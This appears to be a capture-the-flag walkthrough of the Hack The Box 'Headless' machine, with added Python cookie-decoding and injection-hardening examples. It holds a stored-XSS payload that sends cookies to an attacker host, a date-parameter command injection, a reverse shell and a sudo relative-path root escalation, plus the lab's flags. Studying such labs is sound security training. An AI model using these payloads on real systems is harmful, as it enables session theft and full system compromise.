
HTB:Headless[WriteUP]

Contents

Connect to the HTB server and start the target machine

1.Which is the highest open TCP port on the target machine?

2.What is the title of the page that comes up if the site detects an attack in the contact support form?

Visit port 5000 of the target in a browser

3.What is the name of the cookie that is set for a logged in user on the site?

4.What is the relative url of the page on Headless that requires authorization to access?

5.What is the parameter name on POST requests to /dashboard that has a vulnerability in it?

Capture this request with Yakit

From the information shown on the page, submitted forms are likely stored on the target server

6.What is the name of the user that the web application is running as?

Execute the whoami command directly with Yakit's Web Fuzzer module

7.Submit the flag located in the dvir user's home directory.

USER_FLAG:826b69de0f383342b6a152920c36348a

8.What is the full path to the script that dvir can run as any user without a password?

9.syscheck calls other scripts to collect output. What is the name of the script that is called with a relative path?

10.Submit the flag located in the root user's home directory.

ROOT_FLAG:5ee60636b53a9eaea6a7b81fd2bef87a


Connect to the HTB server and start the target machine

Target IP: 10.10.11.8

Assigned IP: 10.10.16.8


1.Which is the highest open TCP port on the target machine?

Scan all TCP ports of the target with nmap

nmap -p- --min-rate=1500 -T4 -sS -Pn 10.10.11.8

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nmap -p- --min-rate=1500 -T4 -sS -Pn 10.10.11.8                                                      
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-21 04:57 EDT
Warning: 10.10.11.8 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.11.8
Host is up (7.5s latency).
Not shown: 51645 closed tcp ports (reset), 13888 filtered tcp ports (no-response)
PORT     STATE SERVICE
22/tcp   open  ssh
5000/tcp open  upnp

Nmap done: 1 IP address (1 host up) scanned in 111.90 seconds

The scan shows the highest open port on the target is 5000


2.What is the title of the page that comes up if the site detects an attack in the contact support form?

Run an nmap script and service scan against ports 22 and 5000 of the target

nmap -p22,5000 -sCV 10.10.11.8

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nmap -p22,5000 -sCV 10.10.11.8                 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-21 05:01 EDT
Stats: 0:00:52 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 05:03 (0:00:52 remaining)
Nmap scan report for 10.10.11.8
Host is up (0.082s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey:
|   256 90:02:94:28:3d:ab:22:74:df:0e:a3:b2:0f:2b:c6:17 (ECDSA)
|_  256 2e:b9:08:24:02:1b:60:94:60:b3:84:a9:9e:1a:60:ca (ED25519)
5000/tcp open  upnp?
| fingerprint-strings:
|   GetRequest:
|     HTTP/1.1 200 OK
|     Server: Werkzeug/2.2.2 Python/3.11.2
|     Date: Mon, 21 Oct 2024 08:49:30 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 2799
|     Set-Cookie: is_admin=InVzZXIi.uAlmXlTvm8vyihjNaPDWnvB_Zfs; Path=/
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="UTF-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>Under Construction</title>
|     <style>
|     body {
|     font-family: 'Arial', sans-serif;
|     background-color: #f7f7f7;
|     margin: 0;
|     padding: 0;
|     display: flex;
|     justify-content: center;
|     align-items: center;
|     height: 100vh;
|     .container {
|     text-align: center;
|     background-color: #fff;
|     border-radius: 10px;
|     box-shadow: 0px 0px 20px rgba(0, 0, 0, 0.2);
|   RTSPRequest:
|     <!DOCTYPE HTML>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request version ('RTSP/1.0').</p>
|     <p>Error code explanation: 400 - Bad request syntax or unsupported method.</p>
|     </body>
|_    </html>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port5000-TCP:V=7.94SVN%I=7%D=10/21%Time=6716186F%P=x86_64-pc-linux-gnu%
SF:r(GetRequest,BE1,"HTTP/1\.1\x20200\x20OK\r\nServer:\x20Werkzeug/2\.2\.2
SF:\x20Python/3\.11\.2\r\nDate:\x20Mon,\x2021\x20Oct\x202024\x2008:49:30\x
SF:20GMT\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length
SF::\x202799\r\nSet-Cookie:\x20is_admin=InVzZXIi\.uAlmXlTvm8vyihjNaPDWnvB_
SF:Zfs;\x20Path=/\r\nConnection:\x20close\r\n\r\n<!DOCTYPE\x20html>\n<html
SF:\x20lang=\"en\">\n<head>\n\x20\x20\x20\x20<meta\x20charset=\"UTF-8\">\n
SF:\x20\x20\x20\x20<meta\x20name=\"viewport\"\x20content=\"width=device-wi
SF:dth,\x20initial-scale=1\.0\">\n\x20\x20\x20\x20<title>Under\x20Construc
SF:tion</title>\n\x20\x20\x20\x20<style>\n\x20\x20\x20\x20\x20\x20\x20\x20
SF:body\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20font-family:
SF:\x20'Arial',\x20sans-serif;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20background-color:\x20#f7f7f7;\n\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20margin:\x200;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20padding:\x200;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20d
SF:isplay:\x20flex;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20justi
SF:fy-content:\x20center;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0align-items:\x20center;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20height:\x20100vh;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\n\x20\x20\x20
SF:\x20\x20\x20\x20\x20\.container\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20text-align:\x20center;\n\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20background-color:\x20#fff;\n\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20border-radius:\x2010px;\n\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20box-shadow:\x200px\x200px\x2020px\x20rgba\(0,\x2
SF:00,\x200,\x200\.2\);\n\x20\x20\x20\x20\x20")%r(RTSPRequest,16C,"<!DOCTY
SF:PE\x20HTML>\n<html\x20lang=\"en\">\n\x20\x20\x20\x20<head>\n\x20\x20\x2
SF:0\x20\x20\x20\x20\x20<meta\x20charset=\"utf-8\">\n\x20\x20\x20\x20\x20\
SF:x20\x20\x20<title>Error\x20response</title>\n\x20\x20\x20\x20</head>\n\
SF:x20\x20\x20\x20<body>\n\x20\x20\x20\x20\x20\x20\x20\x20<h1>Error\x20res
SF:ponse</h1>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code:\x20400</p
SF:>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Message:\x20Bad\x20request\x20ver
SF:sion\x20\('RTSP/1\.0'\)\.</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error
SF:\x20code\x20explanation:\x20400\x20-\x20Bad\x20request\x20syntax\x20or\
SF:x20unsupported\x20method\.</p>\n\x20\x20\x20\x20</body>\n</html>\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 104.04 seconds

The scan suggests the target is very likely Debian, with an HTTP server on port 5000

Visit port 5000 of the target in a browser

We test inserting an XSS script in the Message field

An attack alert is returned; its title is: Hacking Attempt Detected


3.What is the name of the cookie that is set for a logged in user on the site?

Fill in some arbitrary information, submit, and capture the request with Yakit

In the request headers the name of the cookie that is set can be seen: is_admin


4.What is the relative url of the page on Headless that requires authorization to access?

Use ffuf to fuzz URL paths on the target

ffuf -u http://10.10.11.8:5000/FUZZ -w ../dictionary/common.txt

Try visiting directly in the browser: http://{TARGET_IP}:5000/dashboard

The page reports Unauthorized, so /dashboard confirmed to require authorization


5.What is the parameter name on POST requests to /dashboard that has a vulnerability in it?

Return to the support path

Fill in the name, email address and phone number arbitrarily; in Message, again enter an XSS test string

Capture this request with Yakit

Also change the UA to: <script>alert(1)</script>

After sending, a JS popup appears, which shows the target only detects and blocks XSS in the Message field

So we only need to place the XSS script in the User-Agent header to bypass the check

From the information shown on the page, submitted forms are likely stored on the target server

Try using this stored XSS to obtain the cookie of every user who views the form

<script>var i=new Image(); i.src="http://{NATIVE_IP}:{NATIVE_PORT}/?cookie="+btoa(document.cookie);</script>

Start an nc listener on the local side

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nc -lvnp 1425                                                                                        
listening on [any] 1425 ...
connect to [10.10.16.19] from (UNKNOWN) [10.10.11.8] 37800
GET /?cookie=aXNfYWRtaW49SW1Ga2JXbHVJZy5kbXpEa1pORW02Q0swb3lMMWZiTS1TblhwSDA= HTTP/1.1
Host: 10.10.16.19:1425
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:5000/
Connection: keep-alive

The administrator's cookie was obtained

cookie=aXNfYWRtaW49SW1Ga2JXbHVJZy5kbXpEa1pORW02Q0swb3lMMWZiTS1TblhwSDA=

After Base64 decoding

cookie=is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0
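The two is_admin values seen so far (the default one from the nmap Set-Cookie header and the admin one recovered from the exfiltration request) have the payload.signature shape of itsdangerous signed tokens, which is an inference from the Werkzeug banner. The following Python is an added example, not code from the original writeup: it decodes both values and lists the cookie attributes whose absence allowed document.cookie to read the token; the two strings come from the page, the function names are my own.

```python
import base64
import json

# Both strings are copied from this writeup: the Set-Cookie header seen in the
# nmap output, and the btoa(document.cookie) value that reached the nc listener.
SET_COOKIE_HEADER = "is_admin=InVzZXIi.uAlmXlTvm8vyihjNaPDWnvB_Zfs; Path=/"
EXFIL_QUERY_VALUE = "aXNfYWRtaW49SW1Ga2JXbHVJZy5kbXpEa1pORW02Q0swb3lMMWZiTS1TblhwSDA="


def b64url_decode(s: str) -> bytes:
    """Decode URL-safe base64 whose '=' padding was stripped (itsdangerous does this)."""
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def decode_signed_value(value: str) -> dict:
    """Split an itsdangerous-style 'payload.signature' token and decode the payload.
    The payload is plain base64url JSON, readable by anyone; only the signature,
    an HMAC over the payload with the server secret, stops a client from forging it."""
    payload_b64, _, signature = value.partition(".")
    return {"role": json.loads(b64url_decode(payload_b64)), "signature": signature}


def audit_set_cookie(header: str) -> dict:
    """Decode the role carried by the cookie and list hardening attributes it lacks.
    Without HttpOnly the value is exposed to document.cookie, which is what made
    the stored-XSS exfiltration on this box possible."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    present = {p.split("=", 1)[0].lower() for p in parts[1:]}
    missing = [a for a in ("httponly", "secure", "samesite") if a not in present]
    return {"name": name, "missing_attributes": missing, **decode_signed_value(value)}


def decode_exfiltrated_cookie(query_value: str) -> dict:
    """Reverse the btoa() step: standard base64 -> 'name=value' -> decoded token."""
    cookie = base64.b64decode(query_value).decode()
    name, _, value = cookie.partition("=")
    return {"name": name, **decode_signed_value(value)}


if __name__ == "__main__":
    print(audit_set_cookie(SET_COOKIE_HEADER))
    print(decode_exfiltrated_cookie(EXFIL_QUERY_VALUE))
```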

Use this cookie to try to access /dashboard

After sending, the remaining traffic is passed through and we enter the Administrator Dashboard

Click Generate Report to send the request, and change the Cookie in the request to the admin user's cookie again

After repeated testing, appending a semicolon followed by a command to the date parameter achieves command execution
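A semicolon in the date parameter leading to command execution is the signature of user input spliced into a shell command string. Below, as an added example and not the application's real code, is a hypothetical reconstruction of that pattern next to a hardened version; REPORT_SCRIPT, the function names and the "report.sh" path are assumptions.

```python
import re
import subprocess
from datetime import date

# Hypothetical: the real handler behind /dashboard is not shown in the writeup,
# and the script path is an assumed name used only for illustration.
REPORT_SCRIPT = "/opt/app/report.sh"


def build_report_cmd_unsafe(user_date: str) -> str:
    """Vulnerable pattern: the date parameter is spliced into one shell string.
    A value such as '2024-10-21;whoami' ends the intended command at the ';'
    and the shell runs the remainder, which is the behaviour observed on the box."""
    return f"bash {REPORT_SCRIPT} {user_date}"  # would be handed to shell=True


def validate_report_date(user_date: str) -> str:
    """Allow-list validation: only a well-formed ISO calendar date passes."""
    if not re.fullmatch(r"\d{4}-\d{2}-\d{2}", user_date):
        raise ValueError("date must be YYYY-MM-DD")
    date.fromisoformat(user_date)  # rejects impossible dates like 2024-13-45
    return user_date


def build_report_argv(user_date: str) -> list:
    """Hardened: the validated value becomes a single argv element, no shell parsing."""
    return ["/usr/bin/bash", REPORT_SCRIPT, validate_report_date(user_date)]


def run_report(user_date: str) -> subprocess.CompletedProcess:
    """Execute without a shell; metacharacters inside argv are never interpreted."""
    return subprocess.run(build_report_argv(user_date), capture_output=True, text=True, timeout=30)


def shell_segments(user_date: str) -> list:
    """Review aid: show how a shell would split the unsafe string at ; & and |,
    handy when triaging suspicious date values found in access logs."""
    cmd = build_report_cmd_unsafe(user_date)
    return [seg.strip() for seg in re.split(r"[;&|]+", cmd) if seg.strip()]
```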


6.What is the name of the user that the web application is running as?

Execute the whoami command directly with Yakit's Web Fuzzer module

The response shows the web app is running as user: dvir


7.Submit the flag located in the dvir user's home directory.

Try getting a reverse shell with nc

URL-encode the payload

Start an nc listener on the local side

┌──(root㉿kali)-[/home/kali/Desktop]
└─# nc -lvnp 1425                                                                                        
listening on [any] 1425 ...

Click to send the request

The local nc listener receives the connection

┌──(root㉿kali)-[/home/kali/Desktop]
└─# nc -lvnp 1425                                                                                        
listening on [any] 1425 ...
connect to [10.10.16.19] from (UNKNOWN) [10.10.11.8] 55668
whoami
dvir

Upgrade the tty

script -c /bin/bash -q /dev/null

Locate user_flag

find / -name 'user.txt' 2>/dev/null

View the contents of user_flag

cat /home/dvir/user.txt

script -c /bin/bash -q /dev/null
dvir@headless:~/app$ find / -name 'user.txt' 2>/dev/null
find / -name 'user.txt' 2>/dev/null
/home/dvir/user.txt
dvir@headless:~/app$ cat /home/dvir/user.txt
cat /home/dvir/user.txt
826b69de0f383342b6a152920c36348a

USER_FLAG:826b69de0f383342b6a152920c36348a


8.What is the full path to the script that dvir can run as any user without a password?

Check which files this user may run with elevated privileges

dvir@headless:~/app$ sudo -l
sudo -l
Matching Defaults entries for dvir on headless:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    use_pty

User dvir may run the following commands on headless:
    (ALL) NOPASSWD: /usr/bin/syscheck

The full path is: /usr/bin/syscheck


9.syscheck calls other scripts to collect output. What is the name of the script that is called with a relative path?

View the file contents: cat /usr/bin/syscheck

#!/bin/bash

if [ "$EUID" -ne 0 ]; then
  exit 1
fi

last_modified_time=$(/usr/bin/find /boot -name 'vmlinuz*' -exec stat -c %Y {} + | /usr/bin/sort -n | /usr/bin/tail -n 1)
formatted_time=$(/usr/bin/date -d "@$last_modified_time" +"%d/%m/%Y %H:%M")
/usr/bin/echo "Last Kernel Modification Time: $formatted_time"

disk_space=$(/usr/bin/df -h / | /usr/bin/awk 'NR==2 {print $4}')
/usr/bin/echo "Available disk space: $disk_space"

load_average=$(/usr/bin/uptime | /usr/bin/awk -F'load average:' '{print $2}')
/usr/bin/echo "System load average: $load_average"

if ! /usr/bin/pgrep -x "initdb.sh" &>/dev/null; then
  /usr/bin/echo "Database service is not running. Starting it..."
  ./initdb.sh 2>/dev/null
else
  /usr/bin/echo "Database service is running."
fi

exit 0

We focus on this section of the code

This code checks whether a process named initdb.sh is running; if it is not found, it prints "Database service is not running. Starting it..." and then executes the initdb.sh script via a relative path


10.Submit the flag located in the root user's home directory.

Create an initdb.sh file in any directory

touch initdb.sh

Write a command into the file that spawns a new Bash

echo -e '#!/bin/bash\n/bin/bash' > initdb.sh

Grant execute permission

chmod +x initdb.sh

Run /usr/bin/syscheck directly with elevated privileges

sudo /usr/bin/syscheck

dvir@headless:~/app$ echo -e '#!/bin/bash\n/bin/bash' > initdb.sh            
echo -e '#!/bin/bash\n/bin/bash' > initdb.sh
dvir@headless:~/app$ cat initdb.sh
cat initdb.sh
#!/bin/bash
/bin/bash
dvir@headless:~/app$ chmod +x initdb.sh
chmod +x initdb.sh
dvir@headless:~/app$ ls -l initdb.sh
ls -l initdb.sh
-rwxr-xr-x 1 dvir dvir 22 Oct 22 15:34 initdb.sh
dvir@headless:~/app$ sudo /usr/bin/syscheck
sudo /usr/bin/syscheck
Last Kernel Modification Time: 01/02/2024 10:05
Available disk space: 2.0G
System load average:  0.00, 0.02, 0.02
Database service is not running. Starting it...
whoami
whoami
root

Upgrade the tty

script -c /bin/bash -q /dev/null

Locate root_flag

find / -name 'root.txt'

View the contents of root_flag

cat /root/root.txt

script -c /bin/bash -q /dev/null
root@headless:/home/dvir/app# find / -name 'root.txt'   
find / -name 'root.txt'
/root/root.txt
root@headless:/home/dvir/app# cat /root/root.txt
cat /root/root.txt
5ee60636b53a9eaea6a7b81fd2bef87a

ROOT_FLAG:5ee60636b53a9eaea6a7b81fd2bef87a


http://www.mrgr.cn/news/56381.html
